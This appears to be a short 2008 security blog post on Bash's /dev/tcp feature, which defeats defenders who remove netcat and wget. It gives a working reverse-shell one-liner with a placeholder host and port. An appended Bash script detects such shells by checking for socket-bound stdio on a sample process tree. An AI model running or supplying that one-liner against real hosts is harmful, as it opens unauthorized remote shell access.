Bash based reverse shell wickedness


Neohapsis just created a lot of pain for those who are trying to stop folks who are able to execute arbitrary code on a host but unable to get a reverse shell. It used to be that you could remove netcat, wget, ftp, etc. and make it much more difficult for a reverse shell to be started. Enter the ever friendly and helpful Bash shell.

All you need is:

$ exec /bin/sh 0</dev/tcp/hostname/port 1>&0 2>&0

and tadaa, reverse shell.

Go check it out – http://labs.neohapsis.com/2008/04/17/connect-back-shell-literally/

Kevin Riggins
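
A defender-side check for the state that one-liner leaves behind, as an added example that is not from the original post or from Neohapsis: it flags shell processes whose stdin, stdout and stderr all point at the same socket. The function names, the list of shell names and the sample tree are assumptions made for illustration; on a live Linux host pass /proc as the argument.

```bash
#!/usr/bin/env bash
# Added defensive example: flag shell processes whose stdin, stdout and stderr
# are all the same socket, the state the one-liner above leaves /bin/sh in.

# find_socket_shells PROC_ROOT -> prints "pid comm socket:[inode]" per hit.
find_socket_shells() {
    local root=${1:-/proc} dir pid comm in out err
    for dir in "$root"/[0-9]*; do
        [ -d "$dir/fd" ] || continue
        pid=${dir##*/}
        comm=$(cat "$dir/comm" 2>/dev/null) || continue
        case $comm in
            sh|bash|dash|ksh|zsh|ash) ;;   # only shells are of interest
            *) continue ;;
        esac
        # readlink fails for processes we are not allowed to inspect; skip them.
        in=$(readlink "$dir/fd/0" 2>/dev/null) || continue
        out=$(readlink "$dir/fd/1" 2>/dev/null) || continue
        err=$(readlink "$dir/fd/2" 2>/dev/null) || continue
        case $in in
            socket:*) ;;                   # stdin must be a socket, not a tty
            *) continue ;;
        esac
        if [ "$in" = "$out" ] && [ "$in" = "$err" ]; then
            printf '%s %s %s\n' "$pid" "$comm" "$in"
        fi
    done
}

# Constructed sample tree (not real process data) so the check runs offline.
build_sample_proc() {
    local root=$1 fd
    mkdir -p "$root/101/fd" "$root/202/fd" "$root/303/fd"
    echo bash  > "$root/101/comm"     # interactive shell on a pty
    echo sh    > "$root/202/comm"     # shell wired to a single TCP socket
    echo nginx > "$root/303/comm"     # non-shell process with socket stdio
    for fd in 0 1 2; do
        ln -s /dev/pts/0       "$root/101/fd/$fd"
        ln -s 'socket:[48213]' "$root/202/fd/$fd"
        ln -s 'socket:[51900]' "$root/303/fd/$fd"
    done
}

sample=$(mktemp -d)
build_sample_proc "$sample"
find_socket_shells "$sample"
rm -rf "$sample"
```

Shells started by inetd-style services can also have socket stdio, so treat a hit as a lead to triage rather than a verdict.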


One Response to Bash based reverse shell wickedness

  1. […] against reverse shell wickedness… In this post, I referenced a very interesting article over at Neohapsis about easily setting up a reverse […]
